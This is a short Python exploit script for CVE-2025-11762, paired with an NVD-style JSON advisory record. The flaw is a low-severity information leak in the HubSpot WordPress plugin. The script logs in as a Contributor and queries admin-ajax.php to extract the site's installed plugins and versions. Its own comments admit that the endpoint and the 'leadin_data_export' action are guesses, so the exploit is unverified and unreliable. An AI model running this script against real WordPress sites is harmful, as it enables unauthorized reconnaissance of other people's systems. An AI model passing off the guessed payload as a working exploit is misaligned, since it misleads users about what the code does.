CVE-2025-11762

import requests # Exploit script for CVE-2025-11762 # Demonstrates information disclosure via authenticated access target_url = "http://target-wordpress-site.com" username = "contributor" password = "password" session = requests.Session() # Step 1: Authenticate to obtain WordPress session cookie login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": target_url + "/wp-admin/", "testcookie": "1" } print("[*] Attempting to login as: {}".format(username)) login_response = session.post(target_url + "/wp-login.php", data=login_data) if login_response.status_code == 200: print("[+] Login successful, session cookie obtained.") # Step 2: Send request to trigger vulnerability # The vulnerability is in class-adminconstants.php, likely triggered via an AJAX action # Note: The exact endpoint parameter might vary based on plugin implementation exploit_url = target_url + "/wp-admin/admin-ajax.php" # Hypothetical payload based on file analysis payload = { "action": "leadin_data_export", # Example action, actual parameter depends on code hook } print("[*] Sending payload to vulnerable endpoint...") vuln_response = session.get(exploit_url, params=payload) if vuln_response.status_code == 200: print("[+] Request sent. Checking response for plugin list...") # Check if response contains plugin data (JSON or HTML dump) if "plugins" in vuln_response.text.lower(): print("[+] Potential sensitive information found:") print(vuln_response.text) else: print("[-] Expected pattern not found, manual verification required.") else: print("[-] Exploit request failed.") else: print("[-] Login failed.")

{"cve": {"id": "CVE-2025-11762", "sourceIdentifier": "[email protected]", "published": "2026-04-24T08:16:29.000", "lastModified": "2026-04-24T14:38:26.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HubSpot All-In-One Marketing - Forms, Popups, Live Chat plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 11.3.32 via the leadin/public/admin/class-adminconstants.php file. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract a list of all installed plugins and their versions which can be leveraged for reconnaissance and further attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/leadin/tags/11.3.33/public/admin/class-adminconstants.php", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/CVE-2025-11762", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2a8c62e6-f459-433a-b0c4-c79285ea7fe9?source=cve", "source": "[email protected]"}]}}